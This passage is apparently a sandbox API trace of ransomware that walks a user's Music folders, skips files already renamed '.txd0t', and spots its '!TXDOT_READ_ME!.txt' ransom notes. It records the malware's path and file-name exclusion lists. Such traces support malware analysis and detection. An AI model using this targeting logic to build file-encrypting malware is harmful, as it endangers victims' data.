PathFindExtensionW (pszPath="WDCK.m4a.txd0t") returned=".txd0t" [0119.846] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.846] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99e3e230, ftCreationTime.dwHighDateTime=0x1d5e756, ftLastAccessTime.dwLowDateTime=0xb0dfbc60, ftLastAccessTime.dwHighDateTime=0x1d5ee1e, ftLastWriteTime.dwLowDateTime=0x51e1d481, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x4b34, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="WDCK.m4a.txd0t", cAlternateFileName="WDCKM4~1.TXD")) returned 0 [0119.846] FindClose (in: hFindFile=0xec1df0 | out: hFindFile=0xec1df0) returned 1 [0119.846] GetProcessHeap () returned 0xe30000 [0119.846] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed39f8 | out: hHeap=0xe30000) returned 1 [0119.846] FindNextFileW (in: hFindFile=0xec18b0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5450cdb0, ftCreationTime.dwHighDateTime=0x1d5e2b4, ftLastAccessTime.dwLowDateTime=0x341c2fc0, ftLastAccessTime.dwHighDateTime=0x1d5e440, ftLastWriteTime.dwLowDateTime=0x51e436ce, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xcd67, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="VO0C5WvUIA8AyL.m4a.txd0t", cAlternateFileName="VO0C5W~1.TXD")) returned 1 [0119.846] StrCmpW (psz1="VO0C5WvUIA8AyL.m4a.txd0t", psz2=".") returned 1 [0119.846] StrCmpW (psz1="VO0C5WvUIA8AyL.m4a.txd0t", psz2="..") returned 1 [0119.846] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Music", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music") returned="C:\\Users\\FD1HVy\\Music" [0119.846] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music", psz2="\\", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\") returned="C:\\Users\\FD1HVy\\Music\\" [0119.846] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\", psz2="VO0C5WvUIA8AyL.m4a.txd0t", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\VO0C5WvUIA8AyL.m4a.txd0t") returned="C:\\Users\\FD1HVy\\Music\\VO0C5WvUIA8AyL.m4a.txd0t" [0119.846] PathFindExtensionW (pszPath="VO0C5WvUIA8AyL.m4a.txd0t") returned=".txd0t" [0119.846] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.846] FindNextFileW (in: hFindFile=0xec18b0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc7e8eb70, ftCreationTime.dwHighDateTime=0x1d5eef0, ftLastAccessTime.dwLowDateTime=0x524877ee, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x524877ee, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="z37nyAMgu2jp3cfWIU", cAlternateFileName="Z37NYA~1")) returned 1 [0119.846] StrCmpW (psz1="z37nyAMgu2jp3cfWIU", psz2=".") returned 1 [0119.846] StrCmpW (psz1="z37nyAMgu2jp3cfWIU", psz2="..") returned 1 [0119.846] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Music", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music") returned="C:\\Users\\FD1HVy\\Music" [0119.846] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music", psz2="\\", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\") returned="C:\\Users\\FD1HVy\\Music\\" [0119.846] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\", psz2="z37nyAMgu2jp3cfWIU", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU" [0119.846] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="\\windows\\system32\\") returned 0x0 [0119.846] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.846] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="\\windows\\system\\") returned 0x0 [0119.846] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.846] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.846] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="\\appdata\\local\\") returned 0x0 [0119.846] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.846] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.847] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.847] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch=":\\boot\\") returned 0x0 [0119.847] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch=":\\perflogs\\") returned 0x0 [0119.847] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch=":\\programdata\\") returned 0x0 [0119.847] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch=":\\drivers\\") returned 0x0 [0119.847] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch=":\\wsus\\") returned 0x0 [0119.847] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.847] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.847] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="crypt_detect") returned 0x0 [0119.847] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="cryptolocker") returned 0x0 [0119.847] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="ransomware") returned 0x0 [0119.847] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="C:\\WINDOWS") returned 0x0 [0119.847] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.847] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="C:\\Program Files") returned 0x0 [0119.847] GetProcessHeap () returned 0xe30000 [0119.847] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4d2) returned 0xed39f8 [0119.847] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU" [0119.847] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", psz2="\\*", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\*") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\*" [0119.847] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\*", lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc7e8eb70, ftCreationTime.dwHighDateTime=0x1d5eef0, ftLastAccessTime.dwLowDateTime=0x524877ee, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x524877ee, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660e23, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1a70 [0119.847] StrCmpW (psz1=".", psz2=".") returned 0 [0119.847] FindNextFileW (in: hFindFile=0xec1a70, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc7e8eb70, ftCreationTime.dwHighDateTime=0x1d5eef0, ftLastAccessTime.dwLowDateTime=0x524877ee, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x524877ee, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.847] StrCmpW (psz1="..", psz2=".") returned 1 [0119.847] StrCmpW (psz1="..", psz2="..") returned 0 [0119.847] FindNextFileW (in: hFindFile=0xec1a70, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51e69890, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x51e69890, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51e8fa97, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0119.848] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0119.848] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0119.848] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU" [0119.848] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", psz2="\\", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\" [0119.848] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\!TXDOT_READ_ME!.txt" [0119.848] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0119.848] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0119.848] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0119.848] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0119.848] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0119.848] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0119.848] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0119.848] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0119.848] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0119.848] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0119.848] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0119.848] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0119.848] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0119.848] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0119.848] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0119.848] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0119.848] FindNextFileW (in: hFindFile=0xec1a70, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96f9e610, ftCreationTime.dwHighDateTime=0x1d5ee03, ftLastAccessTime.dwLowDateTime=0x12962240, ftLastAccessTime.dwHighDateTime=0x1d5ed85, ftLastWriteTime.dwLowDateTime=0x51e69890, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x172c3, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="5YOR.m4a.txd0t", cAlternateFileName="5YORM4~1.TXD")) returned 1 [0119.848] StrCmpW (psz1="5YOR.m4a.txd0t", psz2=".") returned 1 [0119.848] StrCmpW (psz1="5YOR.m4a.txd0t", psz2="..") returned 1 [0119.848] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU" [0119.848] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", psz2="\\", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\" [0119.848] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\", psz2="5YOR.m4a.txd0t", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\5YOR.m4a.txd0t") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\5YOR.m4a.txd0t" [0119.848] PathFindExtensionW (pszPath="5YOR.m4a.txd0t") returned=".txd0t" [0119.848] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.848] FindNextFileW (in: hFindFile=0xec1a70, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f1f5210, ftCreationTime.dwHighDateTime=0x1d5ef33, ftLastAccessTime.dwLowDateTime=0x5213e9a4, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5213e9a4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="7k19qHZKQ", cAlternateFileName="7K19QH~1")) returned 1 [0119.848] StrCmpW (psz1="7k19qHZKQ", psz2=".") returned 1 [0119.848] StrCmpW (psz1="7k19qHZKQ", psz2="..") returned 1 [0119.848] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU" [0119.849] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", psz2="\\", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\" [0119.849] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\", psz2="7k19qHZKQ", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ" [0119.849] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="\\windows\\system32\\") returned 0x0 [0119.849] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.849] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="\\windows\\system\\") returned 0x0 [0119.849] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.849] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.849] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="\\appdata\\local\\") returned 0x0 [0119.849] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.849] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.849] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.849] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch=":\\boot\\") returned 0x0 [0119.849] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch=":\\perflogs\\") returned 0x0 [0119.849] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch=":\\programdata\\") returned 0x0 [0119.849] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch=":\\drivers\\") returned 0x0 [0119.849] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch=":\\wsus\\") returned 0x0 [0119.849] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.849] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.849] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="crypt_detect") returned 0x0 [0119.849] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="cryptolocker") returned 0x0 [0119.849] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="ransomware") returned 0x0 [0119.849] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="C:\\WINDOWS") returned 0x0 [0119.849] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.849] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="C:\\Program Files") returned 0x0 [0119.849] GetProcessHeap () returned 0xe30000 [0119.849] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4e6) returned 0xed90d0 [0119.849] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", cchMax=1126 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ" [0119.849] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", psz2="\\*", cchMax=1126 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\*") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\*" [0119.849] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\*", lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f1f5210, ftCreationTime.dwHighDateTime=0x1d5ef33, ftLastAccessTime.dwLowDateTime=0x5213e9a4, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5213e9a4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660e23, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1c70 [0119.850] StrCmpW (psz1=".", psz2=".") returned 0 [0119.850] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f1f5210, ftCreationTime.dwHighDateTime=0x1d5ef33, ftLastAccessTime.dwLowDateTime=0x5213e9a4, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5213e9a4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.850] StrCmpW (psz1="..", psz2=".") returned 1 [0119.850] StrCmpW (psz1="..", psz2="..") returned 0 [0119.850] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51e8fa97, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x51e8fa97, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51fe6f8f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0119.850] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0119.850] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0119.850] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", cchMax=1126 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ" [0119.850] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", psz2="\\", cchMax=1126 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\" [0119.850] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1126 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\!TXDOT_READ_ME!.txt" [0119.850] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0119.850] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0119.850] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0119.850] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0119.850] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0119.850] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0119.850] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0119.850] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0119.850] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0119.850] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0119.850] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0119.850] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0119.850] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0119.850] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0119.850] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0119.850] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0119.850] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d7fdbe0, ftCreationTime.dwHighDateTime=0x1d5e9c7, ftLastAccessTime.dwLowDateTime=0x58ec1a0, ftLastAccessTime.dwHighDateTime=0x1d5eff7, ftLastWriteTime.dwLowDateTime=0x51e69890, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x4ee3, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="UMILH6.mp3.txd0t", cAlternateFileName="UMILH6~1.TXD")) returned 1 [0119.850] StrCmpW (psz1="UMILH6.mp3.txd0t", psz2=".") returned 1 [0119.850] StrCmpW (psz1="UMILH6.mp3.txd0t", psz2="..") returned 1 [0119.850] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", cchMax=1126 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ" [0119.851] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", psz2="\\", cchMax=1126 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\" [0119.851] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\", psz2="UMILH6.mp3.txd0t", cchMax=1126 | out: 